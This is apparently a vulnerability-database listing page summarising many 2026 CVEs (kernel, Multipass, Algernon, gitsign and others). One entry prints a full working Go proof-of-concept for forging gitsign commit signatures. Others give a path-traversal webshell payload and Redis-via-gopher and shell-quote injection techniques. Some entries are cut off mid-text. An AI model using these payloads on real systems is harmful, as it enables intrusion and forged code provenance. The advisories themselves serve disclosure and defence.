Path traversal in NASA AMMOS AIT-Core's Binary Stream Capture (BSC) component allows unauthenticated remote attackers to direct the ait-bsc process to append attacker-controlled binary data to arbitrary files on the host filesystem, limited only by the OS permissions of the running process. Affected are AIT-Core 3.1.0 and all 2.x versions before 2.6.1, exploitable via a direct HTTP request if the BSC port is network-accessible or via a browser-based CSRF attack that works even against localhost-bound deployments. Publicly available exploit code exists (python_poc.py, attacker_tcp.py, and test1.html), though no CISA KEV listing was identified at time of analysis.

Python Path Traversal RCE Canonical Denial Of Service
NVD GitHub
CVSS 3.1
9.1
EPSS
0.2%
CVE-2026-50258 HIGH This Week

Local privilege escalation in X.Org X server and Xwayland stems from an incomplete fix for CVE-2025-26597, where CheckKeyTypes() fails to clamp non-canonical key types to XkbMaxShiftLevel, enabling stack-based buffer overflows. Authenticated local users on Red Hat Enterprise Linux 6 through 10 can crash the display server or, when X runs as root, escalate to root privileges. No public exploit identified at time of analysis, though the upstream commit reveals the vulnerable code path and the prior CVE-2025-26597 has known exploitation history.

Canonical Stack Overflow Buffer Overflow Privilege Escalation Red Hat Enterprise Linux 10 +4
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-3276 MEDIUM PATCH This Month

Denial-of-service via quadratic algorithmic complexity in CPython's unicodedata.normalize() affects all CPython versions when processing attacker-controlled Unicode strings. The canonical ordering step during Unicode normalization used an insertion sort algorithm with O(n²) time complexity, which degrades severely when input contains long runs of combining characters with alternating Canonical Combining Class (CCC) values. An unauthenticated remote attacker can cause excessive CPU consumption by submitting small crafted payloads (e.g., 65 characters) to any service that passes untrusted input to unicodedata.normalize(). No public exploit code or CISA KEV listing exists at time of analysis.

Information Disclosure Canonical Cpython
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-48595 HIGH POC PATCH GHSA This Week

Credential leakage in elixir-tesla (Tesla HTTP client for Elixir) versions 1.4.0 through 1.18.2 allows Authorization and Host headers to be forwarded to attacker-controlled origins during cross-origin HTTP redirects. The Tesla.Middleware.FollowRedirects component compares header names case-sensitively against a lowercase filter list, so headers using the RFC 7235 canonical casing (e.g., 'Authorization') bypass stripping and reach the redirect target. No public exploit identified at time of analysis, but the upstream fix is committed and a patched release (1.18.3) is available.

Information Disclosure Canonical
NVD GitHub
CVSS 4.0
8.2
EPSS
0.0%
CVE-2026-47184 PyPI MEDIUM PATCH GHSA This Month

Memory exhaustion in python-zeroconf's DNSCache component allows any unauthenticated host on the same Layer-2 segment to OOM-kill or severely degrade processes that consume mDNS/DNS-SD services (CVSS 6.5, AV:A/PR:N). The DNSCache._async_add method imposed no upper bound on cache entries, permitting a local-link attacker to multicast valid mDNS responses with unique names that accumulate across all four internal data structures faster than the 10-second cleanup interval can purge them. A second distinct variant exploits TTL re-advertisement to bloat the internal _expire_heap independently of the cache entry counter, providing a second unbounded growth path that bypasses any entry-count monitoring. No public exploit is identified at time of analysis; a vendor-released patch is available as of zeroconf 0.149.6 or 0.149.7 (minor version discrepancy between sources - see confidence notes).

Canonical Python Denial Of Service Suse
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-47183 PyPI MEDIUM PATCH GHSA This Month

Memory exhaustion in python-zeroconf's exception deduplication logic allows any unauthenticated LAN-adjacent host to permanently pin approximately 9 KB of heap memory per unique malformed mDNS packet, enabling denial of service against zeroconf-dependent applications. The flaw affects all versions of the pip package `zeroconf` prior to 0.149.6; the unbounded `_seen_logs` dict in `QuietLogger` and `DNSIncoming._log_exception_debug` retained full Python traceback objects - and thus raw inbound packet buffers - keyed by attacker-influenced exception strings derived from ephemeral source ports, byte offsets, and pointer links. No public exploit or CISA KEV listing exists at time of analysis, but the attack is mechanistically straightforward and particularly severe on memory-constrained deployments such as Home Assistant on Raspberry Pi-class hardware, where sustained flood traffic can OOM-kill the process and disable HomeKit, Chromecast/Matter, and AirPlay discovery.

Canonical Python Denial Of Service Suse
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-46690 Cargo MEDIUM GHSA This Month

Memory unsafety in unbounded-spsc 0.2.0 (Rust crate) allows a local attacker with low privileges to cause out-of-bounds reads, allocator corruption, and process crashes by winning a TOCTOU race between Sender::send and Receiver::drop. The root defect is a pointer-as-value transmute in the DISCONNECTED arm of Sender::send (src/lib.rs:384-401): the code transmutes an 8-byte raw pointer (*mut Producer<T>) directly into Consumer<T>, meaning the fake Consumer's internal Arc::ptr points at the Sender struct itself rather than the real ArcInner<Buffer<T>>. No public exploit identified at time of analysis, but a proof-of-concept reproducing SIGSEGV is included in the advisory and reproduces approximately 3 out of 10 trials under heavy contention in release mode.

Information Disclosure Canonical Buffer Overflow
NVD GitHub VulDB
CVSS 3.1
5.8
EPSS
0.0%
CVE-2026-47674 npm MEDIUM PATCH GHSA This Month

IP restriction bypass in Hono's ip-restriction middleware (hono/ip-restriction) prior to version 4.12.21 allows unauthenticated remote attackers to circumvent configured deny and allow rules by submitting non-canonical IPv6 representations of restricted addresses. String equality comparison applied after only partial normalization means that compressed, explicit-zero, or hex-notation IPv4-mapped IPv6 forms of a listed address silently fail to match the normalized rule entry, causing enforcement to be skipped entirely. No public exploit has been identified at time of analysis, but the bypass requires only trivial reformatting of a standard IPv6 address, making it practically low-effort for any attacker aware of the flaw.

Information Disclosure Canonical
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-49238 HIGH PATCH This Week

Virtual machine escape in Canonical Multipass before 1.16.3 allows a root user inside a guest VM to read arbitrary files on the host filesystem by bypassing the host-side sshfs_server path containment. The flaw lives in the validate_path function (CWE-22 path traversal), which uses naive string prefix matching and accepts dot-dot sequences. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV, though the technical write-up in the GHSA advisory provides enough detail to make exploitation reproducible.

Path Traversal Canonical
NVD GitHub
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-49237 HIGH PATCH This Week

Local privilege escalation in Canonical Multipass for macOS before 1.16.3 allows a low-privileged local user to obtain root execution by replacing co-located auxiliary binaries that the multipassd LaunchDaemon invokes via a user-writable PATH directory. The flaw is an incomplete remediation of CVE-2025-5199: while 1.16.0 corrected ownership of the multipassd binary itself, five sibling binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, sshfs_server) were left owned by the installing user and writable, enabling binary planting. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Privilege Escalation Apple Canonical
NVD GitHub
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-42790 HIGH PATCH This Week

TLS server impersonation in Erlang/OTP's public_key library lets a name-constrained subordinate CA forge a trusted identity for hostnames outside its permitted DNS subtree. By chaining a nameConstraints enforcement gap with a legacy CommonName fallback in pkix_verify_hostname/3, an attacker holding a DNS-restricted intermediate (e.g. permitted;DNS:allowed.example.com) can issue a SAN-less leaf whose CN is an out-of-scope host (e.g. victim.example.com) and have a stock ssl:connect client with verify_peer accept it. It affects OTP 19.3 through the fixed releases (public_key 1.4 onward) and is rated CVSS 4.0 7.6; there is no public exploit identified at time of analysis and it is not on CISA KEV.

Authentication Bypass Canonical Erlang Otp
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.0%
CVE-2026-46081 HIGH PATCH This Week

Local privilege escalation via memory corruption in Linux Kernel crypto subsystem (acomp) affects systems using asynchronous hardware compression accelerators such as Intel QAT. The flaw stems from acomp_save_req() storing the wrong pointer (&req->chain instead of req itself) in req->base.data, causing the completion callback acomp_reqchain_done() to dereference fields at incorrect offsets. No public exploit identified at time of analysis, and EPSS is very low at 0.02%, but the high CVSS (7.8) reflects potential for memory corruption with high confidentiality, integrity, and availability impact.

Linux Canonical Buffer Overflow Memory Corruption
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-46079 MEDIUM PATCH This Month

Null-pointer dereference in the Linux kernel's RBD (RADOS Block Device) subsystem crashes the kernel when device_add_disk() fails after device_add() has already succeeded. Systems running Linux kernel with Ceph RBD support enabled are affected across multiple stable branches from the introduction of commit 27c97abc30e2 through the patched releases. A local attacker with sufficient privileges to map RBD images via the sysfs interface can trigger this error path to cause a kernel panic and system-wide denial of service. No active exploitation is confirmed (not in CISA KEV), and the EPSS score of 0.02% at the 5th percentile signals negligible weaponization probability.

Linux Canonical Denial Of Service Null Pointer Dereference Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-45970 HIGH PATCH This Week

Use-after-free in the Linux kernel bonding driver's Adaptive Load Balancing (ALB) subsystem allows a local low-privileged user to crash the kernel by racing rlb_arp_recv() against rlb_deinitialize() during rapid bond interface up/down cycling. Specifically, the RX handler continues to dereference rx_hashtbl entries after rlb_deinitialize() frees them, because recv_probe is set to NULL without first draining in-flight softirq handlers via synchronize_net(). Systems running bonded NICs in ALB mode (mode=6) on affected kernel versions - including Dell PowerEdge hardware and Canonical-distributed kernels - are at risk of kernel panic. No public exploit identified at time of analysis, and EPSS at 0.02% (7th percentile) confirms no observed mass exploitation.

Linux Canonical Denial Of Service Dell Memory Corruption +1
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-45845 MEDIUM PATCH This Month

Kernel NULL pointer dereference in the Linux TAPRIO traffic scheduler allows a local user with namespace-scoped CAP_NET_ADMIN to trigger a kernel panic. On systems with unprivileged user namespaces enabled - the default on Ubuntu, Fedora, Debian, and most container-oriented distributions - any unprivileged local user can acquire namespace-scoped CAP_NET_ADMIN simply by creating a new network namespace, reducing the effective privilege bar to an ordinary user account. Patched stable releases exist (6.6.141, 6.12.91, 7.0.10, 6.18.33, 7.1-rc2), no active exploitation has been confirmed by CISA KEV, and EPSS is 0.02% (5th percentile), but the straightforward attack sequence and wide Linux footprint make this a priority patch on multi-tenant or container-hosting systems.

Linux Canonical Denial Of Service Null Pointer Dereference Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-45842 MEDIUM PATCH This Month

Null pointer dereference in the Linux kernel SLIP header compression (slhc) subsystem crashes the kernel when a VJ-compressed frame is received on a PPP instance configured with zero receive slots. An unprivileged local user who can create a user namespace can invoke the PPPIOCSMAXCID ioctl with a crafted argument (0xffff0000) that exploits a signed-integer arithmetic shift to supply rslots=0 to slhc_init(), leaving comp->rstate NULL; any subsequent inbound VJ frame targeting slot 0 then dereferences that NULL pointer in softirq context, producing a kernel panic. No public exploit has been identified at time of analysis, and EPSS probability is negligible at 0.02%, but the attack path is fully reachable from unprivileged user namespaces, making the practical privilege bar lower than the PR:L label implies on systems where user namespaces are enabled.

Linux Canonical Denial Of Service Null Pointer Dereference Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-42462 npm HIGH PATCH GHSA This Week

Linked Data Signature forgery in Fedify (the @fedify/fedify ActivityPub server framework) before 2.2.3 lets remote unauthenticated attackers reshape a third-party-signed activity so it is interpreted differently while its signature still verifies. Because the signature covers the canonical RDF graph rather than the JSON-LD serialization, an attacker who has received a signed activity can use JSON-LD keywords (@graph, @reverse, @included) or context-alias tricks to promote, hide, or rewrite fields and have the forged result accepted as authentic. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but the GitHub Security Advisory documents the exact restructuring techniques in detail.

RCE Canonical
NVD GitHub
CVSS 3.1
7.0
EPSS
0.0%
CVE-2026-46497 PyPI LOW PATCH GHSA Monitor

Two-layer blind SSRF in Crawlee for Python (pip/crawlee >= 1.0.0, < 1.7.0) allows an attacker who controls a sitemap or robots.txt file to force the crawler to issue HTTP requests against internal network services (layer 1, all HTTP clients), and - when CurlImpersonateHttpClient is configured - to dispatch non-HTTP scheme requests including gopher://, file://, dict://, and ftp:// (layer 2). The layer 2 escalation enables canonical Redis exploitation via gopher://, making RCE on unauthenticated internal Redis instances achievable from a public-facing crawler. No public exploit code has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog, but the researcher-credited advisory details a fully articulated attack path including Redis RCE.

SSRF Redis RCE Canonical Python
NVD GitHub
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-46431 Go MEDIUM PATCH GHSA This Month

Cross-origin read access to Algernon's SSE auto-refresh event server (versions ≤ 1.17.6) allows any web page visited by a developer to silently subscribe to the live file-change stream via a browser-native EventSource. The root cause is a hardcoded wildcard `Access-Control-Allow-Origin: *` response header in the dedicated SSE port activated by the `-a` flag, with no origin inspection or allow-list logic present in the vendored recwatch handler. No public exploit identified at time of analysis per KEV absence, though a complete working proof-of-concept - including exploit HTML and curl verification transcript - is published in GHSA-hw27-4v2q-5qff.

Information Disclosure Cors Misconfiguration Microsoft Apple Canonical
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-45692 Go LOW PATCH GHSA Monitor

Authorization bypass in Caddy's remote admin `/config` API (versions 2.4.0-2.11.2) allows a certificate-authenticated remote admin client restricted to a specific array-indexed config path (e.g., `/routes/0`) to read and modify sibling array elements (e.g., `routes[1]`) by requesting the path with a leading-zero index variant (`/routes/01`). The root cause is a semantic mismatch between two internal layers: the authorization layer performs string prefix matching (`strings.HasPrefix`), while the config traversal layer parses index components numerically via `strconv.Atoi()`, so `"01"` passes authorization as a prefix of `"0"` but resolves to integer index 1 during traversal. No public exploit is in CISA KEV, but a complete proof-of-concept with captured curl requests and server responses is publicly documented in the vendor GitHub advisory GHSA-x5w9-xh9r-mvfc.

File Upload OpenSSL Canonical
NVD GitHub VulDB
CVSS 3.1
3.8
EPSS
0.0%
CVE-2026-45570 Go LOW PATCH GHSA Monitor

Shell command injection in go-git's SSH transport allows attackers who control repository path values to execute arbitrary shell commands on SSH servers that evaluate exec commands through a login shell. go-git wraps repository paths in single quotes without escaping embedded single-quote characters, diverging from canonical Git's sq_quote_buf behavior. When a go-git client connects to an SSH server whose exec command passes through /bin/sh, /bin/bash, or a ForceCommand wrapper that re-evaluates $SSH_ORIGINAL_COMMAND, an attacker-influenced path containing a single quote can break out of the quoted region and append arbitrary shell tokens. No public exploit identified at time of analysis.

Information Disclosure Canonical
NVD GitHub VulDB
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-45721 Go CRITICAL PATCH GHSA Act Now

Pre-authenticated remote code execution in Algernon web server (≤ 1.17.6) allows attackers who can place a handler.lua file anywhere in a parent directory of the server root to execute arbitrary Lua - including shell commands via run3() and os.execute - in the server process on the next HTTP request. The flaw stems from DirPage walking up to 100 ancestor directories past the configured server root searching for handler.lua, and the permission middleware does not gate this lookup, so an anonymous GET / suffices to trigger execution. Publicly available exploit code exists (the reporter published three working PoC variants and a live verification against 1.17.6).

Microsoft Redis RCE Canonical
NVD GitHub
CVSS 3.1
9.0
EPSS
0.2%
CVE-2026-46366 PHP HIGH PATCH GHSA This Week

{id}.html endpoint, leaking titles, internal IDs, languages, and category bindings via 301 redirect Location headers. The flaw stems from a missing permission filter in the getIdFromSolutionId() method, and a publicly available exploit code path is documented in the GitHub Security Advisory (GHSA-99qv-g4x9-mgc3) with SSVC marking exploitation as PoC and automatable. EPSS is low (0.06%, 19th percentile) and the issue is not in CISA KEV, indicating no confirmed active exploitation despite the high CVSS 4.0 score of 8.7.

Authentication Bypass Canonical Information Disclosure
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-45364 npm HIGH PATCH GHSA This Week

Rate limiter bypass in better-auth versions < 1.4.17 allows attackers to defeat authentication attempt limits by rotating through IPv6 addresses within their allocated /64 prefix or using different textual representations of the same address. The vulnerability affects authentication endpoints including sign-in, sign-up, and password reset when serving IPv6 clients, which includes most cloud providers by default. No public exploit identified at time of analysis.

Google Canonical Authentication Bypass
NVD GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-45375 Go CRITICAL GHSA Act Now

Stored cross-site scripting in SiYuan's Bazaar marketplace (versions ≤ 3.6.5) escalates to arbitrary OS command execution on the Electron desktop client because the kernel sanitizer in kernel/bazaar/package.go HTML-escapes only Author, DisplayName, and Description while passing Name and Version straight to innerHTML sinks. Any attacker who can publish a plugin/theme/template/widget/icon manifest to the public Bazaar - or otherwise drop a malicious plugin.json into the workspace - triggers zero-click code execution the moment a victim opens Settings → Marketplace → Downloaded → Plugins. A detailed POC against b3log/siyuan:v3.6.5 is published in the GHSA advisory; publicly available exploit code exists, though EPSS remains low at 0.04%.

XSS Command Injection Canonical Docker Node.js
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2026-44257 CRITICAL PATCH Act Now

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, efw.file.FileManager.unZip writes zip entries to disk using new File(baseDir, zipEntry.getName()) with no canonical-path check. An entry name such as ../../../pwned.jsp escapes the intended extraction directory and lands anywhere the Tomcat process can write - including the servlet context root. Combined with the framework's multipart /uploadServlet and an event that calls file.saveUploadFiles + FileManager.unZip, a remote attacker with no credentials drops a JSP webshell and executes arbitrary commands as the Tomcat user. This vulnerability is fixed in 4.08.010.

Canonical Command Injection Tomcat
NVD GitHub
CVSS 4.0
9.3
EPSS
0.2%
CVE-2026-44288 npm MEDIUM PATCH GHSA This Month

protobufjs versions 7.5.5 and earlier, and 8.0.0-8.0.1 accept overlong UTF-8 byte sequences in the minimal UTF-8 decoder used by non-Node and fallback decoding paths, allowing attackers to bypass byte-level filtering and decode strings containing characters that were not present in the raw protobuf binary input. This integrity issue affects applications that rely on pre-decoding byte validation before using protobuf strings in security-sensitive contexts. Patch versions 7.5.6 and 8.0.2 are available; Node.js Buffer-backed paths are not directly affected.

Canonical Node.js Information Disclosure Red Hat
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44309 Go MEDIUM PATCH GHSA This Month

{ // re-encodes canonical form return err } r, _ := c2.Reader() data, _ := io.ReadAll(r) summary, err := v.Verify(ctx, data, sig, true) // verifies re-encoded bytes, not raw bytes ``` The same pattern appears in `verify-tag`: ```go // internal/commands/verify-tag/verify_tag.go:76-95 tagData := new(plumbing.MemoryObject) if err := tagObj.EncodeWithoutSignature(tagData); err != nil { return err } ``` The codebase itself acknowledges the problem in `ObjectHash`: ```go // pkg/git/verify.go:137-142 // We're making big assumptions here about the ordering of fields // in Git objects. Unfortunately go-git does loose parsing of objects, // so it will happily decode objects that don't match the unmarshal type. // We should see if there's a better way to detect object types. switch { case bytes.HasPrefix(data, []byte("tree ")): encoder, err = commit(obj, sig) ``` go-git's loose parsing means that for a commit containing two `tree` headers, it silently discards the first and retains the second. `EncodeWithoutSignature` then produces a canonical commit body containing only the second tree - which can differ from what git-core resolves. The `git verify-commit` path (`internal/commands/root/verify.go`) receives the raw commit bytes directly from git-core and does **not** re-encode them: ```go // internal/commands/root/verify.go:56-70 detached := len(args) >= 2 if detached { data, sig, err = readDetached(s, args...) // raw bytes from git-core } else { sig, err = readAttached(s, args...) } ... summary, err := v.Verify(ctx, data, sig, true) // raw bytes, no re-encoding ``` The two paths therefore reach opposite conclusions for the same malformed commit: `git verify-commit` fails (raw bytes with both trees ≠ signed canonical bytes), while `gitsign verify` succeeds (re-encoded bytes match signed bytes). An attacker does not need a signing key to trigger the confusion. Given any existing legitimately gitsign-signed commit from Alice: ``` tree T1 ← Alice's real tree (what go-git and gitsign see) author Alice <alice@corp.com> ... committer Alice <alice@corp.com> ... gpgsig -----BEGIN SIGNED MESSAGE----- <Alice's valid signature over T1 canonical form> -----END SIGNED MESSAGE----- This is Alice's commit. ``` An attacker crafts a new malformed commit object: ``` tree T2 ← attacker's malicious tree (git-core uses this) tree T1 ← Alice's tree (go-git uses this) author Alice <alice@corp.com> ... committer Alice <alice@corp.com> ... gpgsig -----BEGIN SIGNED MESSAGE----- <Alice's valid signature - replayed verbatim> -----END SIGNED MESSAGE----- This is Alice's commit. ``` - **`gitsign verify`**: go-git picks T1, re-encodes, Alice's signature verifies. Output: "Good signature from alice@corp.com." - **`git log` / `git-core`**: uses T2 (attacker-controlled content). - **Rekor lookup**: `ObjectHash` also goes through the go-git round-trip, so the logged hash is the T1-canonical hash - consistent with the forged verification output but not with the actual raw object. The attack requires only that the malformed object be accepted into the local repository (bypassing server-side fsck), and that the victim runs `gitsign verify`. ```go // poc_tree_mismatch.go - run from repo root: go run ./poc_tree_mismatch.go package main import ( "context" "crypto" "crypto/ecdsa" "crypto/elliptic" "crypto/rand" "crypto/x509" "crypto/x509/pkix" "fmt" "io" "math/big" "strings" "time" "github.com/go-git/go-git/v5/plumbing" "github.com/go-git/go-git/v5/plumbing/object" "github.com/go-git/go-git/v5/storage/memory" "github.com/sigstore/gitsign/internal/signature" ggit "github.com/sigstore/gitsign/pkg/git" ) type identity struct { cert *x509.Certificate priv crypto.Signer } func (i *identity) Certificate() (*x509.Certificate, error) { return i.cert, nil } func (i *identity) CertificateChain() ([]*x509.Certificate, error) { return []*x509.Certificate{i.cert}, nil } func (i *identity) Signer() (crypto.Signer, error) { return i.priv, nil } func (i *identity) Delete() error { return nil } func (i *identity) Close() {} func indentSig(sig string) string { sig = strings.TrimSuffix(sig, "\n") lines := strings.Split(sig, "\n") out := "gpgsig " + lines[0] + "\n" for _, ln := range lines[1:] { out += " " + ln + "\n" } return out } func main() { priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) tmpl := &x509.Certificate{ SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "attacker"}, NotBefore: time.Now().Add(-time.Minute), NotAfter: time.Now().Add(time.Hour), KeyUsage: x509.KeyUsageDigitalSignature, ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageCodeSigning}, BasicConstraintsValid: true, } rawCert, _ := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) cert, _ := x509.ParseCertificate(rawCert) treeFirst := strings.Repeat("a", 40) // git-core uses this treeSecond := strings.Repeat("b", 40) // go-git uses this author := "author Eve <eve@example.com> 1700000000 +0000" committer := "committer Eve <eve@example.com> 1700000000 +0000" msg := "msg\n" // Sign the go-git canonical form (second tree only) canonicalData := fmt.Sprintf("tree %s\n%s\n%s\n\n%s", treeSecond, author, committer, msg) id := &identity{cert: cert, priv: priv} resp, err := signature.Sign(context.Background(), id, []byte(canonicalData), signature.SignOptions{Detached: true, Armor: true, IncludeCerts: 0}) if err != nil { panic(err) } // Craft malformed raw commit: first=treeFirst (git-core), second=treeSecond (go-git) malformedRaw := fmt.Sprintf("tree %s\ntree %s\n%s\n%s\n%s\n%s", treeFirst, treeSecond, author, committer, indentSig(string(resp.Signature)), msg) st := memory.NewStorage() enc := st.NewEncodedObject() enc.SetType(plumbing.CommitObject) w, _ := enc.Writer() _, _ = w.Write([]byte(malformedRaw)) _ = w.Close() c, err := object.DecodeCommit(st, enc) if err != nil { panic(err) } // Reproduce what gitsign verify does out := new(plumbing.MemoryObject) if err := c.EncodeWithoutSignature(out); err != nil { panic(err) } r, _ := out.Reader() verifyData, _ := io.ReadAll(r) roots := x509.NewCertPool() roots.AddCert(cert) v, _ := ggit.NewCertVerifier(ggit.WithRootPool(roots)) _, verr := v.Verify(context.Background(), verifyData, []byte(c.PGPSignature), true) objHash, oerr := ggit.ObjectHash(verifyData, []byte(c.PGPSignature)) rawObj := &plumbing.MemoryObject{} rawObj.SetType(plumbing.CommitObject) _, _ = rawObj.Write([]byte(malformedRaw)) fmt.Println("FIRST_TREE_IN_RAW (git-core):", treeFirst) fmt.Println("SECOND_TREE_IN_RAW (go-git):", treeSecond) fmt.Println("GO_GIT_PARSED_TREE:", c.TreeHash.String()) fmt.Println("VERIFY_DATA_EQUALS_CANONICAL:", string(verifyData) == canonicalData) fmt.Println("CERT_VERIFY_ERROR:", verr) // nil = signature accepted fmt.Println("OBJECTHASH_ERROR:", oerr) fmt.Println("OBJECTHASH_FROM_VERIFY_DATA:", objHash) fmt.Println("RAW_MALFORMED_COMMIT_HASH:", rawObj.Hash().String()) // differs from objHash } ``` **Expected output:** ``` FIRST_TREE_IN_RAW (git-core): aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa SECOND_TREE_IN_RAW (go-git): bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb GO_GIT_PARSED_TREE: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb VERIFY_DATA_EQUALS_CANONICAL: true CERT_VERIFY_ERROR: <nil> ← signature accepted OBJECTHASH_ERROR: <nil> OBJECTHASH_FROM_VERIFY_DATA: <hash of canonical form> RAW_MALFORMED_COMMIT_HASH: <different hash> ← hash mismatch confirms split ``` - **Signature binding bypass**: `gitsign verify` reports a valid signature from a trusted identity for a commit that git-core resolves to completely different content (a different tree). - **Signature replay without a key**: An attacker can reuse any existing gitsign-signed commit to produce a new commit that passes `gitsign verify` but points to attacker-controlled content, without possessing any signing key. - **Rekor tlog inconsistency**: `ObjectHash` also goes through the go-git round-trip, so the hash stored in or looked up from the transparency log is the normalized hash, not the raw object hash. An auditor cross-referencing the tlog hash against the actual object store will see a mismatch. - **Verification path divergence**: `git verify-commit` and `gitsign verify` reach opposite verdicts for the same malformed commit, undermining auditability. Change the `gitsign verify` and `gitsign verify-tag` CLI commands to read the raw object bytes from the git object store and strip the signature header manually, mirroring what git-core does and what `commandVerify` already does when called by `git verify-commit`: ```go // internal/commands/verify/verify.go - replace lines 63-92 enc, err := repo.Storer.EncodedObject(plumbing.CommitObject, *h) if err != nil { return fmt.Errorf("error reading encoded commit object: %w", err) } r, err := enc.Reader() if err != nil { return err } rawBytes, err := io.ReadAll(r) if err != nil { return err } data, sig, err := git.ExtractSignatureFromRawObject(rawBytes) if err != nil { return err } // data is now the raw bytes without the gpgsig header - identical to what git-core passes summary, err := v.Verify(ctx, data, sig, true) ``` This aligns the CLI verification path with the `commandVerify` (git verify-commit) path that already handles raw bytes correctly. Add a pre-verification check in `ObjectHash` and in the verification path that rejects objects with duplicate field headers (duplicate `tree`, `parent`, `author`, `committer`), returning an error rather than silently normalizing: ```go func validateRawCommitFields(data []byte) error { seen := map[string]bool{} for _, line := range bytes.Split(data, []byte("\n")) { if idx := bytes.IndexByte(line, ' '); idx > 0 { key := string(line[:idx]) if seen[key] { return fmt.Errorf("malformed commit: duplicate field %q", key) } seen[key] = true } if len(line) == 0 { break // end of headers } } return nil } ``` This is a defense-in-depth measure but does not address the fundamental architectural issue of verifying re-encoded bytes. This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).

Canonical Authentication Bypass Suse Red Hat
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44429 Go MEDIUM PATCH GHSA This Month

Stored cross-site scripting in MCP Registry's catalogue UI allows any user with a publish token to inject arbitrary event handlers via the `websiteUrl` field by breaking out of an `href` attribute with an unescaped double-quote character. The server-side URL validator accepts quotes and the client-side `escapeHtml` helper fails to encode them in attribute context, enabling attackers to execute JavaScript on the registry.modelcontextprotocol.io origin with access to localStorage, XHR, and auth tokens. Vendor-released patch version 1.7.7 available; actively confirmed via proof-of-concept.

Canonical XSS Microsoft
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-41583 Cargo CRITICAL PATCH GHSA Act Now

Consensus failure in Zebra nodes before 4.3.1 allows remote attackers to trigger network partitioning by submitting V4 or V5 transactions with invalid sighash hash types. After a refactoring removed critical validation logic from C++ FFI code, Zebra failed to enforce consensus rules restricting hash type values in transparent transaction signatures, creating divergence from zcashd nodes. Attackers can exploit this remotely without authentication (CVSS:4.0 AV:N/AC:L/PR:N) to partition the Zcash network and enable potential double-spend attacks. No public exploit identified at time of analysis, but GitHub advisory (GHSA-8m29-fpq5-89jj) confirms the attack mechanism and vendor-released patches are available.

Canonical Information Disclosure
NVD GitHub
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-42261 HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in PromptHub 0.4.9 through 0.5.3 allows authenticated users to bypass IPv6 address validation and probe internal network resources. The /api/skills/fetch-remote endpoint accepts user-supplied URLs and fetches them server-side, reflecting up to 5 MB of response data. Flawed IPv6 validation allows attackers to reach RFC1918 private networks, loopback addresses, and link-local destinations using IPv4-mapped IPv6 hex representations and alternate ::1 notations. When ALLOW_REGISTRATION=true (a documented configuration), any internet user can register and exploit this vulnerability. Vendor-released patch: version 0.5.4. EPSS data not available; no evidence of active exploitation (not in CISA KEV).

Canonical SSRF
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-44111 npm LOW PATCH Monitor

OpenClaw before version 2026.4.15 allows authenticated users with access to the memory tool to read arbitrary Markdown files within the workspace root by bypassing path restrictions in the QMD backend's memory_get function. The vulnerability enables attackers to access workspace Markdown files outside canonical memory locations or indexed QMD result sets, effectively circumventing the intended memory-path policy. No public exploit code or active exploitation has been identified.

Canonical Authentication Bypass
NVD GitHub
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-43249 HIGH PATCH This Week

Double-free memory corruption in Linux kernel's Xen 9P filesystem driver (9p/xen) allows adjacent network attackers to crash the kernel or potentially execute arbitrary code. The xenwatch thread racing with back-end state changes triggers use-after-free during teardown of xen_9pfs_front_free(), causing general protection faults. Vendor patches available for mainline 7.0 and stable branches 6.19.6, 6.18.16, and 6.12.75. EPSS score of 0.02% (5th percentile) suggests low exploitation probability in the wild; no public exploit or CISA KEV listing at time of analysis.

Canonical Denial Of Service Linux Red Hat Suse
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-43100 MEDIUM PATCH This Month

